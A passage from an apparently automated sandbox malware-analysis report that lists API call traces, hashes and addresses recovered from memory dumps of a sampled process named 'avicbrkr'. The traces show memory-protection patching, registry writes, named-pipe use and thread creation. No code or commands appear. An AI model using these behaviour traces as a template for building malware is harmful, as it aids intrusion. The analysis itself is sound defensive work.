                      • Opcode Fuzzy Hash: ffb935db6ea6c051b1d0eca01df2d2fbc916f721d8cbb48f9e318c3022d213b9
                      • Instruction Fuzzy Hash: EA210A35610118FFCB23AF95EC8ACAE7F7DEB08750F154466F909A2220D7765E90DB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlen.KERNEL32(?,?,?,?,0037B5E2), ref: 00387BCB
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • lstrcpy.KERNEL32(00000000,?), ref: 00387BE2
                      • StrChrA.SHLWAPI(00000000,0000002E), ref: 00387BEB
                      • GetModuleHandleA.KERNEL32(00000000,?,0037B5E2), ref: 00387C09
                        • Part of subcall function 00387C56: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,0038819A,00399540,0000001C,00387E1E,00000002,00000000,00000001,00000000,?,00000000), ref: 00387C9C
                        • Part of subcall function 00387C56: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,0037B5E2,?,0038819A,00000000,?,?,?,0037B5E2,00000000), ref: 00387D05
                        • Part of subcall function 00387C56: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,0038819A,00000000,?,?), ref: 00387D39
                        • Part of subcall function 00387C56: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,0037B5E2,?,0038819A,00000000,?,?,?,0037B5E2,00000000,00000000,00000000), ref: 00387D50
                        • Part of subcall function 00387C56: RtlEnterCriticalSection.NTDLL(H}*), ref: 00387D71
                        • Part of subcall function 00387C56: RtlLeaveCriticalSection.NTDLL(H}*), ref: 00387D8F
                        • Part of subcall function 00387C56: GetLastError.KERNEL32(?,0038819A,00000000,?,?,?,0037B5E2,00000000,00000000,00000000,0037D9D1,?,0000005C,?,0037DDEC,?), ref: 00387DB7
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual$CriticalHeapSection$AllocateEnterErrorFreeHandleLastLeaveModulelstrcpylstrlen
                      • String ID:
                      • API String ID: 4024945899-0
                      • Opcode ID: 09831e11e448beac7bc681bc3cc70f2f50b5242fca67b74c79e8aae9709c20c7
                      • Instruction ID: 5a57dd4cc19157b3a08b6152e70c55c2015aee05eddc82ab509b48379d364d04
                      • Opcode Fuzzy Hash: 09831e11e448beac7bc681bc3cc70f2f50b5242fca67b74c79e8aae9709c20c7
                      • Instruction Fuzzy Hash: FF214F70904309DFCB26EF68CD48AAEBBBABF55300F258099E406AB361D774DA41CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlenW.KERNEL32(00000000,00000000,003970EC,003970C0,?,?,?,00391753,?,00000000,?), ref: 003915CE
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,00391753,?,00000000,?), ref: 003915F0
                      • lstrcpyW.KERNEL32(00000000,00000000), ref: 0039161C
                      • lstrcatW.KERNEL32(00000000,0039FA5C), ref: 00391628
                        • Part of subcall function 003913CB: strstr.NTDLL ref: 003914CB
                        • Part of subcall function 003913CB: StrChrA.SHLWAPI(?,00000040), ref: 003914F4
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateByteCharFreeMultiWidelstrcatlstrcpylstrlenstrstr
                      • String ID:
                      • API String ID: 3820859035-0
                      • Opcode ID: 78cc966e46d51193608b58f0224d20ff60b9df3406655c71510e831a866f1449
                      • Instruction ID: b158b447411ce7d9d75e0ce95d262c2abc16c08c54bbe5cb992ca5be14f6cd26
                      • Opcode Fuzzy Hash: 78cc966e46d51193608b58f0224d20ff60b9df3406655c71510e831a866f1449
                      • Instruction Fuzzy Hash: 3211343250011ABFCF22AFA4CC88C9F7FADEF09390B048425F905AA151D735DA51DBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0038ECD3,00000000,?,00000000,0038F1FF,?,0039D47C), ref: 0038EB11
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0038EB29
                      • memcpy.NTDLL(00000000,0039D47C,-00000008,?,?,?,0038ECD3,00000000,?,00000000,0038F1FF,?,0039D47C), ref: 0038EB6D
                      • memcpy.NTDLL(00000001,0039D47C,00000001,0038F1FF,?,0039D47C), ref: 0038EB8E
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$AllocateHeaplstrlen
                      • String ID:
                      • API String ID: 1819133394-0
                      • Opcode ID: e5403fc0252522dd998860154e76fdc626808de5b7e4f6ba16608b4d42781acf
                      • Instruction ID: 33f23fb0288b1c883a98fff9f57bf6a3617737e46519c7388b723abb8caa9ab1
                      • Opcode Fuzzy Hash: e5403fc0252522dd998860154e76fdc626808de5b7e4f6ba16608b4d42781acf
                      • Instruction Fuzzy Hash: 5711C272A04214BFD722DB69DC85D9ABBEEEB80360F1501BBF50597290E6759E00C7A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • SwitchToThread.KERNEL32(?,0039D270,?,00000000,003713EB), ref: 0038C540
                      • memset.NTDLL ref: 0038C575
                      • memset.NTDLL ref: 0038C58C
                      • memset.NTDLL ref: 0038C5A3
                        • Part of subcall function 0038ACED: RtlLeaveCriticalSection.NTDLL(003713EB), ref: 0038AD27
                        • Part of subcall function 0038ACED: HeapFree.KERNEL32(00000000,003713EB), ref: 0038AD36
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset$FreeHeap$CriticalLeaveSectionSwitchThread
                      • String ID:
                      • API String ID: 1176524582-0
                      • Opcode ID: 1906bc1fa29d5365b022335d6110f0f50a2222051e75c7d37a2978872c4e0ad7
                      • Instruction ID: 14294f3d0effc905f09d4f332804b3df508446157f01f582f4713f3e8c9a0ee4
                      • Opcode Fuzzy Hash: 1906bc1fa29d5365b022335d6110f0f50a2222051e75c7d37a2978872c4e0ad7
                      • Instruction Fuzzy Hash: 6A11C879D1061067DA13772AAD87C4F3B6DBBC2B02F050167F104A7122C73619068BB6
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                      • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                      • lstrcpy.KERNEL32(00000000), ref: 003876D2
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FileHeapTime$AllocateCurrentFreeNameSystemTempThreadlstrcpy
                      • String ID:
                      • API String ID: 1991932461-0
                      • Opcode ID: c36961d4d0d53927c1a822c349442e643139b7e964a80536a9e02058f196989a
                      • Instruction ID: 0fd40d0d912c2a1301ebf88ec87e41575e477925a8c28ae94061aeb1b0995017
                      • Opcode Fuzzy Hash: c36961d4d0d53927c1a822c349442e643139b7e964a80536a9e02058f196989a
                      • Instruction Fuzzy Hash: B601F573529B147FDB232BB88CC8D6B3A6DEF00740B254566F901E3241EA75DC0047B0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlen.KERNEL32(?), ref: 0037509C
                      • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 003750C2
                      • lstrcpy.KERNEL32(00000014,?), ref: 003750E7
                      • memcpy.NTDLL(?,?,?), ref: 003750F4
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateHeaplstrcpylstrlenmemcpy
                      • String ID:
                      • API String ID: 1388643974-0
                      • Opcode ID: f991ffcfdabe8c91b07bb4cce5e3d35eb3d9bce98bd24f9b9e7f73a6eb23fe0e
                      • Instruction ID: 5de790f801455e93a9b34bdf76f2ca499dc46e555bcbf6219854969232730658
                      • Opcode Fuzzy Hash: f991ffcfdabe8c91b07bb4cce5e3d35eb3d9bce98bd24f9b9e7f73a6eb23fe0e
                      • Instruction Fuzzy Hash: 89114971510609EFCB22CF58D944E9A7BF8FB48704F10855AF84987320D775E914CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00372F40,?,00000000), ref: 003725FA
                      • lstrlen.KERNEL32(0039D1D8), ref: 0037261B
                      • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 00372633
                      • lstrcpy.KERNEL32(00000000,0039D1D8), ref: 00372645
                        • Part of subcall function 0038762C: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,00372651,00000000), ref: 00387641
                        • Part of subcall function 0038762C: GetLastError.KERNEL32 ref: 0038764B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Time$AllocateCreateDirectoryErrorFileHeapLastSystemlstrcpylstrlen
                      • String ID:
                      • API String ID: 3262898209-0
                      • Opcode ID: 6f67a27e4459efe2e0aecf80c85e51f4530adf2a526754b1c2a3d2e62e69f70b
                      • Instruction ID: e4e777eded73df5e36d2ee2704af9430825e7c696bfaba535910e1ad23f145a3
                      • Opcode Fuzzy Hash: 6f67a27e4459efe2e0aecf80c85e51f4530adf2a526754b1c2a3d2e62e69f70b
                      • Instruction Fuzzy Hash: F5018476904244ABC7239BA9AC88EAF7BBCAB48301F14406AF909D3341E6799905C764
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrcatW.KERNEL32(?,?), ref: 003729AA
                        • Part of subcall function 00386FE8: GetLastError.KERNEL32 ref: 00387032
                        • Part of subcall function 00386FE8: WaitForSingleObject.KERNEL32(000000C8), ref: 00387057
                        • Part of subcall function 00386FE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,?), ref: 003870A2
                        • Part of subcall function 00386FE8: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 003870B7
                        • Part of subcall function 00386FE8: SetEndOfFile.KERNEL32(?,?,?,?), ref: 003870C4
                        • Part of subcall function 00386FE8: GetLastError.KERNEL32(?,?,?), ref: 003870D0
                        • Part of subcall function 00386FE8: CloseHandle.KERNEL32(?), ref: 003870DC
                      • WaitForSingleObject.KERNEL32(00002710,?), ref: 003729CD
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 003729EF
                      • GetLastError.KERNEL32(?,00372BDD,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00372A03
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$ErrorLast$ObjectSingleWait$CloseCreateHandlePointerWritelstrcat
                      • String ID:
                      • API String ID: 3295507663-0
                      • Opcode ID: 01f4d935485a3c187fa5b9922d0424d4eeb2cea1d5e6badee77280838bb1d769
                      • Instruction ID: b0d37ff95a3680451b16668273fa4f18135513f762a3095cd6f8392386fdbabe
                      • Opcode Fuzzy Hash: 01f4d935485a3c187fa5b9922d0424d4eeb2cea1d5e6badee77280838bb1d769
                      • Instruction Fuzzy Hash: 04F06232254608BBDB335F60AC0AF5B3B2DEF05751F208415FA1AD81E0EB76D9219B69
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlenW.KERNEL32(00633038,?,00000000,?,!Cc,00633038,00000000), ref: 006344DD
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • memcpy.NTDLL(00000000,00633038,00000000,00000000,?,?,!Cc,00633038,00000000), ref: 00634507
                      • memset.NTDLL ref: 0063451B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateHeaplstrlenmemcpymemset
                      • String ID: !Cc
                      • API String ID: 3744489918-3374438881
                      • Opcode ID: 23017333b32ea59625e874946afa460f698a67dfecab2d209234e2ef0765e03e
                      • Instruction ID: 41254ebec0181fe5a7a982534e7e64e1b34d4daa4a26a571b35faf1f434017d8
                      • Opcode Fuzzy Hash: 23017333b32ea59625e874946afa460f698a67dfecab2d209234e2ef0765e03e
                      • Instruction Fuzzy Hash: 62F09073A00214BBCB11EFA8CC85DDBBBEEDF49340B004529FA05D7201EA70EE0486E4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • InterlockedExchange.KERNEL32(0039D190,00000000), ref: 00371E98
                      • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 00371EB3
                        • Part of subcall function 003885BA: wsprintfA.USER32 ref: 0038860C
                      • lstrcpy.KERNEL32(00000000,0039E520), ref: 00371ED4
                        • Part of subcall function 0038B8D2: memset.NTDLL ref: 0038B92E
                        • Part of subcall function 0038B8D2: memcpy.NTDLL(0000002C,?,00000010,00000000,00000000,00000054,00000054), ref: 0038B93C
                        • Part of subcall function 0038B8D2: RtlInitializeCriticalSection.NTDLL(00000008), ref: 0038B948
                        • Part of subcall function 0038B8D2: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 0038B95B
                        • Part of subcall function 0038B8D2: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 0038B975
                        • Part of subcall function 0038B8D2: CreateThread.KERNEL32(00000000,00000000,0038B64A,?,00000000,00000000), ref: 0038B9BF
                        • Part of subcall function 0038B8D2: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 0038B9DF
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 00371EF5
                        • Part of subcall function 0038BA07: SetEvent.KERNEL32(?,00371F20,?,0039D270,?,00000000,003713EB), ref: 0038BA1B
                        • Part of subcall function 0038BA07: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0038BA35
                        • Part of subcall function 0038BA07: CloseHandle.KERNEL32(?), ref: 0038BA3E
                        • Part of subcall function 0038BA07: CloseHandle.KERNEL32(?), ref: 0038BA4C
                        • Part of subcall function 0038BA07: RtlEnterCriticalSection.NTDLL(00000008), ref: 0038BA58
                        • Part of subcall function 0038BA07: RtlLeaveCriticalSection.NTDLL(00000008), ref: 0038BA81
                        • Part of subcall function 0038BA07: Sleep.KERNEL32(000001F4), ref: 0038BA90
                        • Part of subcall function 0038BA07: CloseHandle.KERNEL32(?), ref: 0038BA9D
                        • Part of subcall function 0038BA07: LocalFree.KERNEL32(?), ref: 0038BAAB
                        • Part of subcall function 0038BA07: RtlDeleteCriticalSection.NTDLL(00000008), ref: 0038BAB5
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$CloseCreateHandle$EventFreeHeap$AllocateDeleteEnterErrorExchangeInitializeInterlockedLastLeaveLocalMutexObjectSingleSleepThreadWaitlstrcpymemcpymemsetwsprintf
                      • String ID:
                      • API String ID: 1424382472-0
                      • Opcode ID: 38d532755e3f54874634110db78e028db987ea5c83c5e6a2f3704212c4740cf6
                      • Instruction ID: c6b37c0c1c09454356965165636aa03f010cd372919e04f9cc4cac875f60d9ea
                      • Opcode Fuzzy Hash: 38d532755e3f54874634110db78e028db987ea5c83c5e6a2f3704212c4740cf6
                      • Instruction Fuzzy Hash: A7F09037751311B7D6332765BC0FF4B3E5DEB81B61F050462FA05AA2E0DA6688008664
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 0037BFDE
                      • GetLastError.KERNEL32(?,?,00373DFB,0000012B,0039D244,?,?,?,00373E29,00000000,00000000,00000000,00000000), ref: 0037BFE9
                      • WaitNamedPipeA.KERNEL32(00002710), ref: 0037C00B
                      • WaitForSingleObject.KERNEL32(00000000), ref: 0037C019
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                      • String ID:
                      • API String ID: 4211439915-0
                      • Opcode ID: 3b25d82187d49c47c5c3333c16ac5b1c224f64a07c97b4a9b1023fb9f0e1b3cb
                      • Instruction ID: d30eedb8e34d16c616e3f7d2fdbe8d5bd1dd091986254ee91f4dd2d64e2e1ef0
                      • Opcode Fuzzy Hash: 3b25d82187d49c47c5c3333c16ac5b1c224f64a07c97b4a9b1023fb9f0e1b3cb
                      • Instruction Fuzzy Hash: D3F06231615120ABD7321B65AC4DB5BBB19EB047A1F228526F90DE61E0C3228C40D690
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00637614,006316B0,?,00637614), ref: 006329B3
                      • GetVersion.KERNEL32(?,00637614), ref: 006329C2
                      • GetCurrentProcessId.KERNEL32(?,00637614), ref: 006329D1
                      • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00637614), ref: 006329EA
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Process$CreateCurrentEventOpenVersion
                      • String ID:
                      • API String ID: 845504543-0
                      • Opcode ID: a995c3f0121ef49880adc3c6d7fe7913a68e192a6a378e65f0f7878219a147ff
                      • Instruction ID: b0df28c0a3411c32bac31fc3c49ea48905ce7186594b4cd96b41cbbc8f9d21bd
                      • Opcode Fuzzy Hash: a995c3f0121ef49880adc3c6d7fe7913a68e192a6a378e65f0f7878219a147ff
                      • Instruction Fuzzy Hash: 21F09AB0549B12ABE7709F6CFC2B7943BA7A31A721F10A152F501C62E0D7B08840CBC8
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                      • memset.NTDLL ref: 003897A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateHeaplstrlenmemcpymemset
                      • String ID: ~FvR9
                      • API String ID: 3744489918-3041887914
                      • Opcode ID: 110d7f625abe3e20d507ac508b3093a386e78556033da8da4469484df8064ba7
                      • Instruction ID: 7269bca8c05dc8bbf49f785a93bbe46d9e01f155260df232611c92230decb226
                      • Opcode Fuzzy Hash: 110d7f625abe3e20d507ac508b3093a386e78556033da8da4469484df8064ba7
                      • Instruction Fuzzy Hash: 51E0E5B790431167CA326AB89C8CE5B2ADCEBD8350B050876F905D7201E525C81486B0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E8A7
                      • Sleep.KERNEL32(0000000A,?,00000001,0037D9CC), ref: 0038E8B1
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0038E8D9
                        • Part of subcall function 00389E1C: StrTrimA.SHLWAPI(?,003973F4), ref: 00389E55
                        • Part of subcall function 00389E1C: StrTrimA.SHLWAPI(00000001,003973F4), ref: 00389E72
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E8F5
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSectionTrim$EnterFreeHeapLeaveSleep
                      • String ID:
                      • API String ID: 4004549260-0
                      • Opcode ID: 13a275ad1169ebdf5e78fccaee2c0a461176ee4ac958e8d86f78e199cee67bc5
                      • Instruction ID: 7d7ba77aa14f0f318399535f9edab495d19de2d478a13cdd1971211c3bf2cf74
                      • Opcode Fuzzy Hash: 13a275ad1169ebdf5e78fccaee2c0a461176ee4ac958e8d86f78e199cee67bc5
                      • Instruction Fuzzy Hash: CCF01C712183409FEB13EB69EC4AF1A77ACAB14B40F154456F891C73A1CA32EC54DB19
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E9E6
                      • Sleep.KERNEL32(0000000A,?,00000001,0037D9CC), ref: 0038E9F0
                      • HeapFree.KERNEL32(00000000), ref: 0038EA1E
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038EA33
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                      • String ID:
                      • API String ID: 58946197-0
                      • Opcode ID: c98224ac68eca3cffcf9da474320ad881416f56e6a40bb33624cfa7a53dd2ab2
                      • Instruction ID: 409dc96ac6dca9f0d05fc57397d9aae20b1afee492f25fcb1c8edf8dc5035b8e
                      • Opcode Fuzzy Hash: c98224ac68eca3cffcf9da474320ad881416f56e6a40bb33624cfa7a53dd2ab2
                      • Instruction Fuzzy Hash: D0F0DAB86542019FEB1ADB29EC4AB153769BB08740F05455AF942D73A0CB75AC14CB14
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00386F0A: CreateFileW.KERNEL32(0039F998,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00386F28
                        • Part of subcall function 00386F0A: GetFileSize.KERNEL32(00000000,00000000,?,?,003913E1,00000000,0039F998,00000000), ref: 00386F38
                        • Part of subcall function 00386F0A: ReadFile.KERNEL32(0039F998,00000000,00000000,00000000,00000000), ref: 00386F64
                        • Part of subcall function 00386F0A: GetLastError.KERNEL32(?,?,003913E1,00000000,0039F998,00000000), ref: 00386F89
                        • Part of subcall function 00386F0A: CloseHandle.KERNEL32(000000FF), ref: 00386F9A
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • strstr.NTDLL ref: 003914CB
                      • StrChrA.SHLWAPI(?,00000040), ref: 003914F4
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                        • Part of subcall function 00391309: memset.NTDLL ref: 00391333
                        • Part of subcall function 00391309: lstrlen.KERNEL32(003914A3,00000001,00000000,00000000,00000000,00000000,00002000,00000000,R9,?,?,?,?,?,?,003914A3), ref: 00391347
                        • Part of subcall function 00391309: memcpy.NTDLL(00000000,?,?), ref: 0039139C
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$Heaplstrlenmemcpymemset$AllocateCloseCreateErrorFreeHandleLastReadSizestrstr
                      • String ID: R9
                      • API String ID: 3000254853-134138977
                      • Opcode ID: 036b42df0dc0808beee2d04171c80a36ae4b0b75adaaa135e268dc77718b8a74
                      • Instruction ID: 1f7a0bf0a8aff80f68418ef49195796c4371a2b5e4cbf5056a04830bcfb03751
                      • Opcode Fuzzy Hash: 036b42df0dc0808beee2d04171c80a36ae4b0b75adaaa135e268dc77718b8a74
                      • Instruction Fuzzy Hash: 35517232D00216ABDF239F688C41BAEBBB9AF85710F178455F809FB241E774DE4087A5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0037ABBC
                      • lstrcpy.KERNEL32(00000000,?), ref: 0037ABD6
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                        • Part of subcall function 0037A045: RegCreateKeyA.ADVAPI32(80000001,?), ref: 0037A0B8
                        • Part of subcall function 0037A045: HeapFree.KERNEL32(00000000,?), ref: 0037A0F9
                        • Part of subcall function 0037A045: HeapFree.KERNEL32(00000000,00000000), ref: 0037A109
                        • Part of subcall function 0037A045: HeapFree.KERNEL32(00000000,00000000,?), ref: 0037A175
                        • Part of subcall function 0037A045: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0037AC33,00000000,?,?,?), ref: 0037A199
                        • Part of subcall function 0037A045: HeapFree.KERNEL32(00000000,?), ref: 0037A1BE
                        • Part of subcall function 0037A045: HeapFree.KERNEL32(00000000,00000000), ref: 0037A1D3
                        • Part of subcall function 00379EE0: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00379F3B
                        • Part of subcall function 00379EE0: RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00379F66
                        • Part of subcall function 00379EE0: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,0037AE2C,?,00397048,00000000), ref: 00379F85
                        • Part of subcall function 00379EE0: HeapFree.KERNEL32(00000000,00000000), ref: 00379FE6
                        • Part of subcall function 00379EE0: memcpy.NTDLL(?,00000000,Hp9,00000000,?,?,8B50F445,0037AE2C,?,?,?,?,?,0037AE2C,?,00397048), ref: 0037A008
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocatememcpy$CloseCreatelstrcpylstrlenmemset
                      • String ID: http
                      • API String ID: 3911341088-2541227442
                      • Opcode ID: 0dc7213d2ab6aa4c2f3436e6b94fd6501f3129213fb836c67ed03bece1d5ea9a
                      • Instruction ID: a170bef22c6217934c439acb105057a00c279b827614ed13bca9cdf7662c4160
                      • Opcode Fuzzy Hash: 0dc7213d2ab6aa4c2f3436e6b94fd6501f3129213fb836c67ed03bece1d5ea9a
                      • Instruction Fuzzy Hash: 2041397190060ABFDF23DFA4CC84AAE7BB9FB48300F118466F51996260DB79AD10DF61
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00386EB8: lstrlen.KERNEL32(?,?,00000000,?,00000000,003777E2,?,?,?,?,?,?,?,?,?,00371255), ref: 00386EC7
                      • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0037787C
